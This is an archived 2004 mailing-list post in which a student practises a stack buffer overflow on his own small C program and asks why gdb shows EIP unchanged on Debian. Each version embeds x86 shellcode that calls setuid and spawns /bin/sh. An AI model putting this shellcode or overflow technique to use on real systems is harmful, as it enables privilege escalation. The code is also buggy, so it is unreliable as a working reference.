Vulnerability Development mailing list archives
problem with RET & debian debuggin'
From: "BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA" <padre () fedro ugr es>
Date: Tue, 09 Mar 2004 10:58:51 +0100
Hi, I'm playing with this lazy code, and I got surprised because while debugging I see some strange behaviours:

    #include <stdio.h>

    main ()
    {
        char foo[8];
        int i;
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/" "/bin/sh" "0";

        for (i = 0; i < 8 + 16; i += 4)
            foo[i] = &shellcode;
    }
With this simple code I want to overwrite ebp & eip. ebp addr should be foo+8 and eip addr foo+12. Compile with the -g option and fire up gdb.

    lobillo@Sion:~$ gcc -g -o prueba1 prueba1.c
    prueba1.c: In function 'main':
    prueba1.c:16: warning: assignment makes integer from pointer without a cast
    lobillo@Sion:~$ gdb -q prueba1
    (gdb) r
    Starting program: /home/lobillo/prueba1

    Program received signal SIGILL, Illegal instruction.
    0x400361cf in __libc_start_main () from /lib/libc.so.6
    (gdb) i r ebp eip
    ebp            0xbffffacc       0xbffffacc
    eip            0x400361cf       0x400361cf
    (gdb) quit
    A debugging session is active.
    Do you still want to close the debugger?(y or n)
    lobillo@Sion:~$
Mmmmmm, first thing we take a look around and see that ebp and eip contain different addresses. Why? I think the overwrite was theoretically implemented, but notice that gdb doesn't think the same xD.

    <  foo  ><  ebp  ><  eip  >
        8        8        8
        |        |        |
        |--------|--------|------> &shellcode
Well, let's see: why was eip not overwritten, but ebp was successfully overwritten? Let's modify the code:

    #include <stdio.h>

    main ()
    {
        char foo[8];
        int i;
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/" "/bin/sh" "0";

        for (i = 0; i < 8 + 16; i += 4)
            foo[i] = 0xbffffabc;
    }
    lobillo@Sion:~$ gcc -g -o prueba2 prueba2.c
    prueba1.c: In function 'main':
    prueba1.c:16: warning: overflow in implicit constant conversion
    lobillo@Sion:~$ gdb -q prueba2
    (gdb) r
    Starting program: /home/lobillo/prueba2

    Program received signal SIGSEGV, Segmentation fault.
    0x40034370 in _dl_pagesize () from /lib/libc.so.6
    (gdb) i r ebp eip
    ebp            0xbffffabc       0xbffffabc
    eip            0x40034370       0x40034370
    (gdb) quit
    A debugging session is active.
    Do you still want to close the debugger?(y or n)
    lobillo@Sion:~$

Yep, ebp overwritten, but what about eip? Let's investigate...

    #include <stdio.h>

    main ()
    {
        char foo[8];
        int i;
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/" "/bin/sh" "0";

        for (i = 8; i < 16; i += 4)
            foo[i] = 0xbffffabc;
    }
Looking at the code, we notice that the -for- will overwrite only eip, by jumping over ebp. Let's see what gdb thinks...

    lobillo@Sion:~$ gcc -g -o prueba3 prueba3.c
    prueba1.c: In function 'main':
    prueba1.c:16: warning: overflow in implicit constant conversion
    lobillo@Sion:~$ gdb -q prueba3
    (gdb) r
    Starting program: /home/lobillo/prueba3

    Program received signal SIGSEGV, Segmentation fault.
    0x40034370 in _dl_pagesize () from /lib/libc.so.6
    (gdb) i r ebp eip
    ebp            0xbffffabc       0xbffffabc
    eip            0x40034370       0x40034370
    (gdb) quit
    A debugging session is active.
    Do you still want to close the debugger?(y or n)
    lobillo@Sion:~$
!!!!! ebp is 0xbffffabc? Eps, guys, this is because I wrote all this shit. I don't understand why eip is not being overwritten and ebp is so strange :P

I'm coding under Debian Woody 3.0, and I notice that Debian has several differences when debugging compared to other distros. Is it true? Thanks, and sorry for my poor English :P
Current thread:
- problem with RET & debian debuggin' BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA (Mar 09)
- Re: problem with RET & debian debuggin' Marius Huse Jacobsen (Mar 12)